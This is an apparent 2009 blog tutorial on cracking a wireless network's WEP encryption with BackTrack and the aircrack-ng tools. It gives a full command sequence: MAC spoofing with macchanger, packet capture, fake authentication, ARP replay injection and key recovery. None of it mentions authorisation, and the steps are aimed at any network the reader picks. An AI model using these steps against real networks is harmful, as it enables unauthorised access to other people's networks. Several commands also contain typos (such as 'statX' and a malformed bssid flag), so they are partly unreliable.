Cracking wireless Network WEP protection
October 29th, 2009
- A compatible wireless Adapter: There are lots of compatible wireless adapter available, but what you need to care about is the size of your Pocket or say your budget. One can easily go for a good Alfa adapter that is easily available in Amazon but I’ll recommend going for AirPcap Adaptor which I discussed before in my previous thread.
However Alfa “AWUS036H/AWUS036H + 9dBi” will be the best option as it is considered as the cheap & Best for everyone.
- Back Track Live CD: Click here to download its DVD ISO if you don’t have one in your Collection. BackTrack is a Popular Linux distribution basically used for Penetration Testing.
Boot your System using Back Track Live CD, now Login with the default Username & Password(Usr:root & Pwd:toor). Once authenticated just type statX to bring KDE desktop.
Launch Konsole a built in Command Line interface and follow the below steps:
- Type airmon-ng to get a list of available network interface card.
- Choose the one you want to use to Crack WEP encryption and type airmon-ng stop interface_name to disable its monitor mode.
- Now you need to change your MAC Address to fake one, but first make sure your card is disabled, you can disable your interface card with command ifconfig interface_name down
- Now to change your MAC Address use the command macchanger –mac 11:22:33:44:55:66 interface_name
- Restart the monitoring mode for this interface by running airmon-ng start interface_name
Once you have Successfully Facked your MAC address you can move to next Step:
- Run airodump-ng interface_name to bring the list of available Wireless Network or Access Point.
- Note down the BSSID, Channel Number(CH) & ESSID for the network you want to Crack WEP encryption.
- Now we require to Capture all the packets to a file, type airodump-ng -c (Channel_Number) -w (file_name) –bssid (BSSID)
- Run aireplay-ng -1 0 -a (BSSID) -h 11:22:33:44:55:66 -e (ESSID) interface_name
- Now Run aireplay-ng -3 -b (BSSID) -h 11:22:33:44:55:66 interface_name
Now the above command will create a huge Traffic and consume more memory and Processor usages, just seat back and watch the number within the #Data column.
Once you received data more than 10000 packets, its time to go for final count down.
Open new Console window and Run the below command:
Aircrack-ng -b (BSSID) filename-01.cap
This final command should have printed WEP Key, if somehow it didn’t then you may need to get more data packets to Successfully complete aircrack.
|interface_name refer to the name of your wireless interface (Ex- wth0/eth0)
BSSID refer to the BSSID of Wireless network
Channel Number refer to Channel number of Wireless network
ESSID refer to the name or SSID of Wireless network
Click the link for more information on Alfa AWUS036H or AWUS036H+9dBi